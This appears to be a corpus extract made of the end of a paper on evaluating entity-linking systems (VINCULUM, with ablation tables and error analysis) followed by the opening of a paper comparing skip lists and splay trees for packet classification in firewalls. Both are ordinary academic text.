MSNBC CrossWikis only 80.4 85.6 86.9 78.5 62.4 62.6 60.4 87.7 70.3 +NER 79.2 83.3 85.1 76.6 61.1 66.4 66.2 77.0 71.8 +FIGER 81.0 86.1 86.9 78.8 63.5 66.7 64.6 87.7 75.4 +NER(GOLD) 85.7 87.4 88.0 80.1 66.7 72.6 72.0 89.3 83.3 +FIGER(GOLD) 84.1 88.8 89.0 81.6 66.1 76.2 76.5 91.8 87.4 Table 4: Performance (%) after incorporating entity types, comparing two sets of entity types (NER and FIGER). Using a set of fine-grained entity types (FIGER) generally achieves better results. 5.3 Incorporating Entity Types Here we investigate the impact of the entity types on the linking performance. The most obvious choice is the traditional NER types (TNER = {PER, ORG, LOC, MISC}). To predict the types of the mentions, we run Stanford NER (Finkel et al., 2005) and set the predicted type tm of each mention m to have probability 1 (i.e. p(tm|m,s) = 1). As to the types of the entities, we map their Freebase types to the four NER types16. A more appropriate choice is 112 fine-grained en- tity types introduced by Ling and Weld (2012) in FIGER, a publicly available package 17. These fine- grained types are not disjoint, i.e. each mention is allowed to have more than one type. For each men- tion, FIGER returns a set of types, each of which is accompanied by a score, tFIGER(m) = {(tj,gj) : tj ∈ TFIGER}. A softmax function is used to proba- bilistically interpret the results as follows: p(tj|m,s) = { 1 Z exp(gj) if (tj,gj) ∈ tFIGER(m), 0 otherwise where Z = ∑ (tk,gk)∈tFIGER(m) exp(gk). We evaluate the utility of entity types in Table 4, which shows that using NER typically worsens the performance. This drop may be attributed to the rigid binary values for type incorporation; it is hard to output the probabilities of the entity types for a mention given the chain model adopted in Stanford NER. We also notice that FIGER types consistently improve the results across the data sets, indicating that a finer-grained type set may be more suitable for the entity linking task. To further confirm this assertion, we simulate the scenario where the gold types are provided for each 16The Freebase types “/person/*” are mapped to PER, “/lo- cation/*” to LOC, “/organization/*” plus a few others like “/sports/sports team” to ORG, and the rest to MISC. 17http://github.com/xiaoling/figer mention (the oracle types of its gold entity). The per- formance is significantly boosted with the assistance from the gold types, which suggests that a better per- forming NER/FIGER system can further improve performance. Similarly, we notice that the results using FIGER types almost consistently outperform the ones using NER types. This observation endorses our previous recommendation of using fine-grained types for EL tasks. 5.4 Coherence Two coherence measures suggested in Section 4.5 are tested in isolation to better understand their effects in terms of the linking performance (Table 5). In gen- eral, the link-based NGD works slightly better than the relational facts in 6 out of 9 data sets (comparing row “+NGD” with row “+REL”). We hypothesize that the inferior results of REL may be due to the in- completeness of Freebase triples, which makes it less robust than NGD. We also combine the two by taking the average score, which in most data set performs the best (“+BOTH”), indicating that two measures provide complementary source of information. 5.5 Overall Performance To answer the last question of how well does VINCULUM perform overall, we conduct an end-to- end comparison against two publicly available sys- tems with leading performance:18 AIDA (Hoffart et al., 2011): We use the recom- mended GRAPH variant of the AIDA package (Ver- sion 2.0.4) and are able to replicate their results when gold-standard mentions are given. 18We are also aware of other systems such as TagMe-2 (Fer- ragina and Scaiella, 2012), DBpedia Spotlight (Mendes et al., 2011) and WikipediaMiner (Milne and Witten, 2008). A trial test on the AIDA data set shows that both Wikifier and AIDA tops the performance of other systems reported in (Cornolti et al., 2013) and therefore it is sufficient to compare with these two systems in the evaluation. 323 http://github.com/xiaoling/figer Approach TAC09 TAC10 TAC10T TAC11 TAC12 AIDA-dev AIDA-test ACE MSNBC no COH 80.9 86.2 87.0 78.6 59.9 68.9 66.3 87.7 86.6 +NGD 81.8 85.7 86.8 79.7 63.2 69.5 67.7 88.1 86.8 +REL 81.2 86.3 87.0 79.3 63.1 69.1 66.4 88.5 86.1 +BOTH 81.4 86.8 87.0 79.9 63.7 69.4 67.5 88.5 86.9 Table 5: Performance (%) after re-ranking candidates using coherence scores, comparing two coherence measures (NGD and REL). “no COH”: no coherence based re-ranking is used. “+BOTH”: an average of two scores is used for re-ranking. Coherence in general helps: a combination of both measures often achieves the best effect and NGD has a slight advantage over REL. Approach TAC09 TAC10 TAC10T TAC11 TAC12 AIDA-dev AIDA-test ACE MSNBC Overall CrossWikis 80.4 85.6 86.9 78.5 62.4 62.6 62.4 87.7 70.3 75.0 +FIGER 81.0 86.1 86.9 78.8 63.5 66.7 64.5 87.7 75.4 76.7 +Coref 80.9 86.2 87.0 78.6 59.9 68.9 66.3 87.7 86.6 78.0 +Coherence =VINCULUM 81.4 86.8 87.0 79.9 63.7 69.4 67.5 88.5 86.9 79.0 AIDA 73.2 78.6 77.5 68.4 52.0 71.9 74.8 77.8 75.4 72.2 WIKIFIER 79.7 86.2 86.3 82.4 64.7 72.1 69.8 85.1 90.1 79.6 Table 6: End-to-end performance (%): We compare VINCULUM in different stages with two state-of-the-art systems, AIDA and WIKIFIER. The column “Overall” lists the average performance of nine data sets for each approach. CrossWikis appears to be a strong baseline. VINCULUM is 0.6% shy from WIKIFIER, each winning in four data sets; AIDA tops both VINCULUM and WIKIFIER on AIDA-test. WIKIFIER (Cheng and Roth, 2013): We are able to reproduce the reported results on ACE and MSNBC and obtain a close enough B3+ F1 number on TAC11 (82.4% vs 83.7%). Since WIKIFIER overgenerates mentions and produce links for common concepts, we restrict its output on the AIDA data to the men- tions that Stanford NER predicts. Table 6 shows the performance of VINCULUM after each stage of candidate generation (Cross- Wikis), entity type prediction (+FIGER), coreference (+Coref) and coherence (+Coherence). The column “Overall” displays the average of the performance numbers for nine data sets for each approach. WIKI- FIER achieves the highest in the overall performance. VINCULUM performs quite comparably, only 0.6% shy from WIKIFIER, despite its simplicity and un- supervised nature. Looking at the performance per data set, VINCULUM and WIKIFIER each is superior in 4 out of 9 data sets while AIDA tops the perfor- mance only on AIDA-test. The performance of all the systems on TAC12 is generally lower than on the other dataset, mainly because of a low recall in the candidate generation stage. We notice that even using CrossWikis alone works pretty well, indicating a strong baseline for future comparisons. The entity type prediction provides the highest boost on performance, an absolute 1.7% increase, among other subcomponents. The corefer- ence stage and the coherence stage also give a rea- sonable lift. In terms of running time, VINCULUM runs reason- ably fast. For a document with 20-40 entity mentions on average, VINCULUM takes only a few seconds to finish the linking process on one single thread. 5.6 System Analysis We outline the differences between the three system architectures in Table 7. For identifying mentions to link, both VINCULUM and AIDA rely solely on NER detected mentions, while WIKIFIER additionally in- cludes common noun phrases, and trains a classifier to determine whether a mention should be linked. For candidate generation, CrossWikis provides better coverage of entity mentions. For example, in Fig- ure 3, we observe a recall of 93.2% at a cut-off of 30 by CrossWikis, outperforming 90.7% by AIDA’s dictionary. Further, Hoffart et al. (2011) report a precision of 65.84% using gold mentions on AIDA- test, while CrossWikis achieves a higher precision at 69.24%. Both AIDA and WIKIFIER use coarse NER types as features, while VINCULUM incorpo- rates fine-grained types that lead to dramatically im- proved performance, as shown in Section 5.3. The differences in Coreference and Coherence are not cru- 324 VINCULUM AIDA WIKIFIER Mention Extraction NER NER NER, noun phrases Candidate Generation CrossWikis an intra-Wikipedia dictionary an intra-Wikipedia dictionary Entity Types FIGER NER NER Coreference find the representative mention - re-rank the candidates Coherence link-based similarity, relation triples link-based similarity link-based similarity, relation triples Learning unsupervised trained on AIDA trained on a Wikipedia sample Table 7: Comparison of entity linking pipeline architectures. VINCULUM components are described in detail in Section 4, and correspond to Figure 2. Components found to be most useful for VINCULUM are highlighted. cial to performance, as they each provide relatively small gains. Finally, VINCULUM is an unsupervised system whereas AIDA and WIKIFIER are trained on labeled data. Reliance on labeled data can often hurt performance in the form of overfitting and/or incon- sistent annotation guidelines; AIDA’s lower perfor- mance on TAC datasets, for instance, may be caused by the different data/label distribution of its train- ing data from other datasets (e.g. CoNLL-2003 con- tains many scoreboard reports without complete sen- tences, and the more specific entities as annotations for metonymic mentions). We analyze the errors made by VINCULUM and categorize them into six classes (Table 8). “Metonymy” consists of the errors where the men- tion is metonymic but the prediction links to its lit- eral name. The errors in “Wrong Entity Types” are mainly due to the failure to recognize the correct en- tity type of the mention. In Table 8’s example, the link would have been right if FIGER had correctly predicted the airport type. The mistakes by the coref- erence system often propagate and lead to the errors under the “Coreference” category. The “Context” cat- egory indicates a failure of the linking system to take into account general contextual information other than the fore-mentioned categories. “Specific Labels” refers to the errors where the gold label is a specific instance of a general entity, includes instances where the prediction is the parent company of the gold en- tity or where the gold label is the township whereas the prediction is the city that corresponds to the town- ship. “Misc” accounts for the rest of the errors. In the example, usually the location name appearing in the byline of a news article is a city name; and VINCULUM, without knowledge of this convention, mistakenly links to a state with the same name. The distribution of errors shown in Table 9 pro- vides valuable insights into VINCULUM’s varying performance across the nine datasets. First, we ob- serve a notably high percentage of metonymy-related errors. Since many of these errors are caused due to incorrect type prediction by FIGER, improvements in type prediction for metonymic mentions can provide substantial gains in future. The especially high per- centage of metonymic mentions in the AIDA datasets thus explains VINCULUM’s lower perfomance there (see Table 6). Second, we note that VINCULUM makes quite a number of “Context” errors on the TAC11 and TAC12 datasets. One possible reason is that when highly ambiguous mentions have been intentionally selected, link-based similarity and relational triples are insufficient for capturing the context. For exam- ple, in “... while returning from Freeport to Port- land. (TAC)”, the mention “Freeport”is unbounded by the state, one needs to know that it’s more likely to have both “Freeport” and “Portland” in the same state (i.e. Maine) to make a correct prediction 19. Another reason may be TAC’s higher percentage of Web documents; since contextual information is more scattered in Web text than in newswire docu- ments, this increases the difficulty of context model- ing. We leave a more sophisticated context model for future work (Chisholm and Hachey, 2015; Singh et al., 2012). Since “Specific Labels”, “Metonymy”, and “Wrong Entity Types” correspond to the annotation issues discussed in Sections 3.2, 3.3, and 3.4, the distribution of errors are also useful in studying annotation inconsistencies. The fact that the er- rors vary considerably across the datasets, for in- stance, VINCULUM makes many more “Specific Labels” mistakes in ACE and MSNBC, strongly suggests that annotation guidelines have a consid- erable impact on the final performance. We also observe that annotation inconsistencies also cause reasonable predictions to be treated as a mistake, 19e.g. Cucerzan (2012) use geo-coordinates as features. 325 Category Example Gold Label Prediction Metonymy South Africa managed to avoid a fifth successive defeat in 1996 at the hands of the All Blacks ... South Africa national rugby union team South Africa Wrong Entity Types Instead of Los Angeles International, for example, consider flying into Burbank or John Wayne Airport ... Bob Hope Airport Burbank, California Coreference It is about his mysterious father, Barack Hussein Obama, an imperious if alluring voice gone distant and then missing. Barack Obama Sr. Barack Obama Context Scott Walker removed himself from the race, but Green never really stirred the passions of former Walker supporters, nor did he garner out- sized support “outstate”. Scott Walker (politician) Scott Walker (singer) Specific Labels What we like would be Seles , ( Olympic champion Lindsay ) Davenport and Mary Joe Fernandez . 1996 Summer Olympics Olympic Games Misc NEW YORK 1996-12-07 New York City New York Table 8: We divide linking errors into six error categories and provide an example for each class. Error Category TAC09 TAC10 TAC10T TAC11 TAC12 AIDA-dev AIDA-test ACE MSNBC Metonymy 16.7% 0.0% 3.3% 0.0% 0.0% 60.0% 60.0% 5.3% 20.0% Wrong Entity Types 13.3% 23.3% 20.0% 6.7% 10.0% 6.7% 10.0% 31.6% 5.0% Coreference 30.0% 6.7% 20.0% 6.7% 3.3% 0.0% 0.0% 0.0% 20.0% Context 30.0% 26.7% 26.7% 70.0% 70.0% 13.3% 16.7% 15.8% 15.0% Specific Labels 6.7% 36.7% 16.7% 10.0% 3.3% 3.3% 3.3% 36.9% 25.0% Misc 3.3% 6.7% 13.3% 6.7% 13.3% 16.7% 10.0% 10.5% 15.0% # of examined errors 30 30 30 30 30 30 30 19 20 Table 9: Error analysis: We analyze a random sample of 250 of VINCULUM’s errors, categorize the errors into six classes, and display the frequencies of each type across the nine datasets. for example, AIDA predicts KB:West Virginia Mountaineers football for “..., Alabama of- fered the job to Rich Rodriguez, but he decided to stay at West Virginia. (MSNBC)” but the gold label is KB:West Virginia University. 6 Related Work Most related work has been discussed in the earlier sections; see Shen et al. (2014) for an EL survey. Two other papers deserve comparison. Cornolti et al. (2013) present a variety of evaluation measures and experimental results on five systems compared head- to-head. In a similar spirit, Hachey et al. (2014) pro- vide an easy-to-use evaluation toolkit on the AIDA data set. In contrast, our analysis focuses on the prob- lem definition and annotations, revealing the lack of consistent evaluation and a clear annotation guide- line. We also show an extensive set of experimental results conducted on nine data sets as well as a de- tailed ablation analysis to assess each subcomponent of a linking system. 7 Conclusion and Future Work Despite recent progress in Entity Linking, the com- munity has had little success in reaching an agree- ment on annotation guidelines or building a standard benchmark for evaluation. When complex EL sys- tems are introduced, there are limited ablation studies for readers to interpret the results. In this paper, we examine 9 EL data sets and discuss the inconsisten- cies among them. To have a better understanding of an EL system, we implement a simple yet effective, unsupervised system, VINCULUM, and conduct ex- tensive ablation tests to measure the relative impact of each component. From the experimental results, we show that a strong candidate generation component (CrossWikis) leads to a surprisingly good result; us- ing fine-grained entity types helps filter out incorrect links; and finally, a simple unsupervised system like VINCULUM can achieve comparable performance with existing machine-learned linking systems and, therefore, is suitable as a strong baseline for future research. There are several directions for future work. We hope to catalyze agreement on a more precise EL an- notation guideline that resolves the issues discussed in Section 3. We would also like to use crowdsourc- ing (Bragg et al., 2014) to collect a large set of these annotations for subsequent evaluation. Finally, we hope to design a joint model that avoids cascading errors from the current pipeline (Wick et al., 2013; Durrett and Klein, 2014). 326 Acknowledgements The authors thank Luke Zettle- moyer, Tony Fader, Kenton Lee, Mark Yatskar for constructive suggestions on an early draft and all members of the LoudLab group and the LIL group for helpful discussions. We also thank the action edi- tor and the anonymous reviewers for valuable com- ments. This work is supported in part by the Air Force Research Laboratory (AFRL) under prime con- tract no. FA8750-13-2-0019, an ONR grant N00014- 12-1-0211, a WRF / TJ Cable Professorship, a gift from Google, an ARO grant number W911NF-13- 1-0246, and by TerraSwarm, one of six centers of STARnet, a Semiconductor Research Corporation program sponsored by MARCO and DARPA. Any opinions, findings, and conclusion or recommenda- tions expressed in this material are those of the au- thor(s) and do not necessarily reflect the view of DARPA, AFRL, or the US government. References Jonathan Bragg, Andrey Kolobov, and Daniel S Weld. 2014. Parallel task routing for crowdsourcing. In Sec- ond AAAI Conference on Human Computation and Crowdsourcing. Xiao Cheng and Dan Roth. 2013. Relational inference for wikification. In EMNLP. Andrew Chisholm and Ben Hachey. 2015. Entity disam- biguation with web links. Transactions of the Associa- tion for Computational Linguistics, 3:145–156. Marco Cornolti, Paolo Ferragina, and Massimiliano Cia- ramita. 2013. A framework for benchmarking entity- annotation systems. In Proceedings of the 22nd interna- tional conference on World Wide Web, pages 249–260. International World Wide Web Conferences Steering Committee. Mark Craven and Johan Kumlien. 1999. Constructing biological knowledge bases by extracting information from text sources. In Proceedings of the Seventh Inter- national Conference on Intelligent Systems for Molecu- lar Biology (ISMB-1999), pages 77–86. S. Cucerzan. 2007. Large-scale named entity disam- biguation based on wikipedia data. In Proceedings of EMNLP-CoNLL, volume 2007, pages 708–716. Silviu Cucerzan. 2012. The msr system for entity linking at tac 2012. In Text Analysis Conference 2012. Greg Durrett and Dan Klein. 2014. A joint model for en- tity analysis: Coreference, typing, and linking. Trans- actions of the Association for Computational Linguis- tics, 2:477–490. Paolo Ferragina and Ugo Scaiella. 2012. Fast and ac- curate annotation of short texts with wikipedia pages. IEEE Software, 29(1):70–75. J.R. Finkel, T. Grenager, and C. Manning. 2005. Incor- porating non-local information into information extrac- tion systems by gibbs sampling. In Proceedings of the 43rd Annual Meeting on Association for Compu- tational Linguistics, pages 363–370. Association for Computational Linguistics. Ben Hachey, Joel Nothman, and Will Radford. 2014. Cheap and easy entity evaluation. In ACL. Hannaneh Hajishirzi, Leila Zilles, Daniel S. Weld, and Luke Zettlemoyer. 2013. Joint Coreference Resolution and Named-Entity Linking with Multi-pass Sieves. In EMNLP. Xianpei Han and Le Sun. 2012. An entity-topic model for entity linking. In Proceedings of the 2012 Joint Confer- ence on Empirical Methods in Natural Language Pro- cessing and Computational Natural Language Learn- ing, pages 105–115. Association for Computational Linguistics. Zhengyan He, Shujie Liu, Mu Li, Ming Zhou, Longkai Zhang, and Houfeng Wang. 2013a. Learning entity rep- resentation for entity disambiguation. Proc. ACL2013. Zhengyan He, Shujie Liu, Yang Song, Mu Li, Ming Zhou, and Houfeng Wang. 2013b. Efficient collective entity linking with stacking. In EMNLP, pages 426–435. Johannes Hoffart, Mohamed A. Yosef, Ilaria Bordino, Ha- gen Fürstenau, Manfred Pinkal, Marc Spaniol, Bilyana Taneva, Stefan Thater, and Gerhard Weikum. 2011. Robust disambiguation of named entities in text. In Proceedings of the Conference on Empirical Methods in Natural Language Processing, pages 782–792. As- sociation for Computational Linguistics. Johannes Hoffart, Yasemin Altun, and Gerhard Weikum. 2014. Discovering emerging entities with ambiguous names. In Proceedings of the 23rd international confer- ence on World wide web, pages 385–396. International World Wide Web Conferences Steering Committee. Raphael Hoffmann, Congle Zhang, Xiao Ling, Luke Zettlemoyer, and Daniel S Weld. 2011. Knowledge- based weak supervision for information extraction of overlapping relations. In Proceedings of the 49th An- nual Meeting of the Association for Computational Lin- guistics: Human Language Technologies, volume 1, pages 541–550. Heng Ji, Ralph Grishman, Hoa Trang Dang, Kira Grif- fitt, and Joe Ellis. 2010. Overview of the tac 2010 knowledge base population track. In Text Analysis Con- ference (TAC 2010). Mitchell Koch, John Gilmer, Stephen Soderland, and Daniel S Weld. 2014. Type-aware distantly supervised relation extraction with linked arguments. In EMNLP. Sayali Kulkarni, Amit Singh, Ganesh Ramakrishnan, and Soumen Chakrabarti. 2009. Collective annotation of Wikipedia entities in web text. In Proceedings of the 327 15th ACM SIGKDD international conference on Knowl- edge discovery and data mining, pages 457–466. ACM. Heeyoung Lee, Angel Chang, Yves Peirsman, Nathanael Chambers, Mihai Surdeanu, and Dan Jurafsky. 2013. Deterministic coreference resolution based on entity- centric, precision-ranked rules. Computational Linguis- tics, pages 1–54. Yang Li, Chi Wang, Fangqiu Han, Jiawei Han, Dan Roth, and Xifeng Yan. 2013. Mining evidences for named entity disambiguation. In Proceedings of the 19th ACM SIGKDD international conference on Knowledge dis- covery and data mining, pages 1070–1078. ACM. Xiao Ling and Daniel S Weld. 2012. Fine-grained entity recognition. In AAAI. James Mayfield, Javier Artiles, and Hoa Trang Dang. 2012. Overview of the tac2012 knowledge base popu- lation track. Text Analysis Conference (TAC 2012). P. McNamee and H.T. Dang. 2009. Overview of the tac 2009 knowledge base population track. Text Analysis Conference (TAC 2009). Pablo N Mendes, Max Jakob, Andrés Garcı́a-Silva, and Christian Bizer. 2011. Dbpedia spotlight: shedding light on the web of documents. In Proceedings of the 7th International Conference on Semantic Systems, pages 1–8. ACM. David Milne and Ian H. Witten. 2008. Learning to link with wikipedia. In Proceedings of the 17th ACM con- ference on Information and knowledge management, pages 509–518. ACM. Andrea Moro, Alessandro Raganato, and Roberto Navigli. 2014. Entity linking meets word sense disambiguation: A unified approach. Transactions of the Association for Computational Linguistics, 2. Lev-Arie Ratinov, Dan Roth, Doug Downey, and Mike Anderson. 2011. Local and global algorithms for dis- ambiguation to wikipedia. In ACL, volume 11, pages 1375–1384. Sebastian Riedel, Limin Yao, and Andrew McCallum. 2010. Modeling relations and their mentions without labeled text. In ECML/PKDD (3), pages 148–163. Wei Shen, Jianyong Wang, and Jiawei Han. 2014. Entity linking with a knowledge base: Issues, techniques, and solutions. TKDE. Avirup Sil and Alexander Yates. 2013. Re-ranking for joint named-entity recognition and linking. In Pro- ceedings of the 22nd ACM international conference on Conference on information & knowledge management, pages 2369–2374. ACM. Sameer Singh, Amarnag Subramanya, Fernando Pereira, and Andrew McCallum. 2012. Wikilinks: A large- scale cross-document coreference corpus labeled via links to wikipedia. Technical report, University of Massachusetts Amherst, CMPSCI Technical Report, UM-CS-2012-015. Valentin I Spitkovsky and Angel X Chang. 2012. A cross- lingual dictionary for english wikipedia concepts. In LREC, pages 3168–3175. 2012. Tac kbp entity selection. http://www.nist. gov/tac/2012/KBP/task_guidelines/ TAC_KBP_Entity_Selection_V1.1.pdf. Michael Wick, Sameer Singh, Harshal Pandya, and An- drew McCallum. 2013. A joint model for discovering and linking entities. In CIKM Workshop on Automated Knowledge Base Construction (AKBC). Jiaping Zheng, Luke Vilnis, Sameer Singh, Jinho D. Choi, and Andrew McCallum. 2013. Dynamic knowledge- base alignment for coreference resolution. In Confer- ence on Computational Natural Language Learning (CoNLL). 328 http://www.nist.gov/tac/2012/KBP/task_guidelines/TAC_KBP_Entity_Selection_V1.1.pdf http://www.nist.gov/tac/2012/KBP/task_guidelines/TAC_KBP_Entity_Selection_V1.1.pdf http://www.nist.gov/tac/2012/KBP/task_guidelines/TAC_KBP_Entity_Selection_V1.1.pdf work_xihaospkm5g7xoaeabghvmripi ---- Submitted 8 March 2019 Accepted 4 June 2019 Published 15 July 2019 Corresponding author Mahdi Abbasi, abbasi@basu.ac.ir Academic editor Sándor Szénási Additional Information and Declarations can be found on page 14 DOI 10.7717/peerj-cs.204 Copyright 2019 Khezrian and Abbasi Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Comparison of the performance of skip lists and splay trees in classification of internet packets Navid Khezrian1 and Mahdi Abbasi2 1 Computer Engineering Faculty, Sharif University of Technology, Tehran, Iran 2 Department of Computer Engineering, Engineering Faculty, Bu-Ali Sina University, Hamedan, Iran ABSTRACT Due to the increasing number of Internet users and the volume of information exchanged by software applications, Internet packet traffic has increased significantly, which has highlighted the need to accelerate the processing required in network systems. Packet classification is one of the solutions implemented in network systems. The most important issue is to use an approach that can classify packets at the speed of the network and show optimum performance in terms of memory usage. In this study, we evaluated the performance in packet classification of two of the most important data structures used in decision trees, i.e. the skip list and splay tree. Our criteria for performance were the time of packet classification, the number of memory accesses, and memory usage of each event. These criteria were tested by the ACL and IPC rules with different numbers of rules as well as by different packet numbers. The results of the evaluation showed that the performance of skip lists is higher than that of splay trees. By increasing the number of classifying rules, both the difference in the speed of packet classification and the superiority of the performance of the skip list over that of the splay tree become more significant. The skip list also maintains its superiority over the splay tree in lower memory usage. The results of the experiments confirm the scalability of this method in comparison to the splay tree method. Subjects Algorithms and Analysis of Algorithms, Computer Networks and Communications Keywords Skip list, Splay tree, Firewall, Memory, Time, Perforrmance INTRODUCTION The Internet is the largest packet-switching network. In this network, information is transmitted in the form of packets from the source to the destination. With the increase in the number of users and the volume of information exchanged by applications, Internet packet traffic has increased significantly. For this reason, in order to accelerate the processing required in network systems such as routers, a basic process called packet classification is used (Baboescu & Varghese, 2001; Taylor, 2005; Perez et al., 2014). Classification of network packets refers to the different streams of packets in network systems (Bontupalli et al., 2018; Harada, Tanaka & Mikawa, 2018; Inoue et al., 2018; Li et al., 2018; Bi, Luo & Sun, 2019). Many network systems use packet routing and guiding policies as well as quick implementation of packet classification policies to carry out traffic management policies (Li et al., 2013; Lin et al., 2016; Tessier et al., 2018). Using these basic processes, packet flow How to cite this article Khezrian N, Abbasi M. 2019. Comparison of the performance of skip lists and splay trees in classification of inter- net packets. PeerJ Comput. Sci. 5:e204 http://doi.org/10.7717/peerj-cs.204 https://peerj.com mailto:abbasi@basu.ac.ir https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.204 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.204 processing has become possible at a very high speed, and the same rules can be applied to all packets belonging to the same traffic stream (Comer, 2004). Network applications that require packet classification are of three types, i.e., security operations, traffic management and quality of service (QOS), and policy-based routing. Several studies have analytically or experimentally have benchmarked the different algorithms of packet classification (Gao, Tan & Gong, 2006; Qi et al., 2009; Lim, 2010; Nagpal et al., 2015). A commonly accepted categorization of the packet classification algorithms is the one presented by Taylor (2005). According to this categorization, the packet classification fall into four classes which are explained below. Exhaustive search In this type of algorithm, all elements within a list are checked to match the search query argument. The main disadvantage of these algorithms is the linear dependence of time complexity on the number of filters (Trabelsi & Zeidan, 2011). Decomposition In decomposition-based algorithms, two processing steps are followed. In the first step, the search is performed individually on the filter set based on each field. In the second step, the results of all searches on the different fields are merged through intersection (Neji & Bouhoula, 2008). Therefore, it is obvious that these algorithms have great potential for parallelism. However, the large size of the data structures required in these algorithms makes them inefficient in terms of memory usage. Tuple spaces In this method, the filters are divided by the number of bits specified in the prefixes of the search query, and the search space is thus partitioned into several sub-spaces. During classification, the input packets are carefully matched and checked against the generated tuples using the simple or tree-based search algorithm on the prefix fields of interest (Kirschenhofer, Martínez & Prodinger, 1995). When matching a packet with a tuple is successful, only those filters are evaluated that are in the equivalent sets of the tuple with regard to their matching with other fields of the packet. The memory complexity of these algorithms is less than the decomposition-based algorithms (Srinivasan, Suri & Varghese, 1999). Decision tree In these algorithms, the set of filters is stored in search trees based on the binary patterns in the prefix fields of the filters. To make a decision tree based on several fields, a tree is created in which the leaves contain a specified filter or a subset of filters that have an intersection in the traversed prefix from the root to the leaves. In these algorithms, the best filter corresponding to the input package is found through the binary contents of the fields in question on the search tree (Sen, 1991). The existing methods have not been able to balance the time and memory consumption. On the other hand, binary trees work well when the elements enter accidentally, but they become inefficient in cases where the operations are sequential. Tree algorithms Khezrian and Abbasi (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.204 2/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.204 use different data structures for searching. Two of the most important data structures of decision trees are the splay tree (Sleator & Tarjan, 1985) and the skip list (Kaufmann, 2007). The performance of a splay tree depends on the history of accesses to its elements. On the other hand, the performance of a skip list depends on an independent randomization of the height of links that lead to specific elements. Therefore, probabilistic methods are used to analyze the operation of splay trees and skip lists. We refer the reader to references (Papadakis, 1993; Pugh, 1990; Sen, 1991; Papadakis, 1993; Kirschenhofer, Martínez & Prodinger, 1995) for probabilistic analysis of the complexity of these algorithms. In this paper, we intend to evaluate and compare the performance of packet-classifying tree algorithms using these two different data structures. For this purpose, we will use the criteria of time complexity and memory complexity. Time complexity depends on the number of algorithmic references to memory to classify each packet and memory complexity depends on the amount of memory used by the data structure of the algorithm. The structure of the paper is organized as follows. First, we review the history of packet- classifying tree algorithms and related previous works for evaluating their performance. The third section describes the general structure of the tree algorithms based on skip lists and splay trees along with their implementation. In the fourth section, after introducing the tools used to produce filters and packets, the evaluation criteria are presented and the results of the evaluation of the performance of the two approaches are compared. The final section draws conclusions and indicates directions for further research. Background The main aim of the paper is to compare the performance of the skip list and splay tree data structures when adapted to multidimensional search on the rule set of a packet classifier. The nature of the search, insert and update of such data structures lets tree-based packet classifiers to reduce the number of required memory during search and hence reduce the complexity of classification. A review of recent research suggests that no study so far has conducted to make an in-depth comparison of the performance of packet-classifying tree algorithms operating with skip lists and splay trees. Previous works simply aimed at optimizing these algorithms without comparing their performance. Pan et al. (2016) used the skip list in 2016 to improve the time performance of information retrieval algorithms in local lists. In their design, given that a packet might share a prefix with previous packages, search in the skip list starts from the closest node previously obtained from this prefix. Therefore, a significant amount of time is saved. Extensive evaluations show that their design can triple the speed of the original design on a 32-bit machine. In 2015, Trabelsi et al. (2015) proposed a multi-stage and dynamic packet filtering mechanism to enhance the performance of the firewall. Their proposed mechanism is implemented by splay tree filters and uses traffic features to minimize packet filtering time. It can decide whether or not dynamic updates of the splay tree filters are needed to filter the next network traffic window and predict the best customized pattern for the tree. In this method of input packet filtering, the initial acceptance of the packet is done using Khezrian and Abbasi (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.204 3/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.204 splay tree data structure, which is dynamically updated according to the traffic streams of the network. As a result, frequent packets have less memory access and, therefore, the total packet filtering time is reduced. In 2013, Zhong, Geng & Zhao (2013) focused on a simple and very important form of remote authentication problem. In this form, membership requests for a dynamic set of n data elements which are stored in unknown directories are verified. In their study, some of the available methods for confirming membership requests such as the Merkle hash tree, skip list, and RSA tree were examined for the first time. In all of these methods, the data structures used by the algorithm to update the data are not fast enough and may have a high complexity time. It could also be possible to reconstruct a range of data structures during the update process. Therefore, they used the B+ tree data structure with RSA accumulators for the authentication scheme, which requires lower computational costs for membership queries in a dynamic data set. Trabelsi & Zeidan (2012) provided in 2012 a mechanism to improve the filtering time of firewall packets by optimizing the comparison order of the matched security-rule fields to decide on the early rejection of incoming packets. Their proposed mechanism was based on changing the order of filtering fields according to traffic statistics. It also allowed to use multi-level classifying filters. Therefore, their proposed mechanism can be considered as a mechanism for protecting the device against denial-of-service attacks (DoS). Early packet acceptance is accomplished through the use of splay trees and changes dynamically with respect to traffic streams. Therefore, frequent packets have less memory access, thereby reducing the matching time. The purpose of their proposed method was to overcome some of the limitations of the previous technique called Self-adjusting Binary Search on Prefix Length (SA-BSPL). The numerical results of the simulation show that their proposed mechanism can improve the firewall performance in terms of total packet processing time compared to the SA-BSPL method. Zeidan & Trabelsi (2011) in 2011 provided a mechanism to improve firewall performance through the rejection of denial-of-service attacks. To do this, they used a security policy of filtering as well as a statistical traffic plan that was implemented in the form of multi-level filter, splay tree, and hash tables. The proposed design rejects unwanted traffic and repetitive packets in the early stages and, therefore, less memory is used. As a result, packet matching time is generally reduced. The results of the evaluation of this method indicate that the proposed mechanism significantly reduces the processing time of DoS traffic. Trabelsi & Zeidan (2011) explored firewall packet rejection techniques in 2011. Two of these techniques include FVSC and PBER that introduce the concept of approximate policy instead of using the full policy provided by the administrator. The benefit of such policies is that they are quicker at evaluating and adapting to dynamic traffic. The third technique, which is called SA-BSPL, uses the splay tree data structure. This data structure dynamically changes according to traffic behavior so that, when a node containing highly matching rules with packets is located close to the root, necessary actions on the packet are possible at a faster rate. These techniques allow the maximum number of packets to be processed as quickly as possible, thereby reducing the time of filtering process. Khezrian and Abbasi (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.204 4/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.204 Neji & Bouhoula (2008) presented a dynamic packet routing algorithm in 2008. They considered a self-regulating tree by combining a binary search pattern on the prefix length with a splay tree. Using a set of hash tables and a splay tree, packet filtering was done according to the destination address. Their research paid particular attention to packets driven by the default path because it covered a major part of routers’ traffic. Their design was better than previous models, especially for very diverse inputs, and had a logarithmic time cost for doing its tasks. In 1995, Kirschenhofer, Martínez & Prodinger 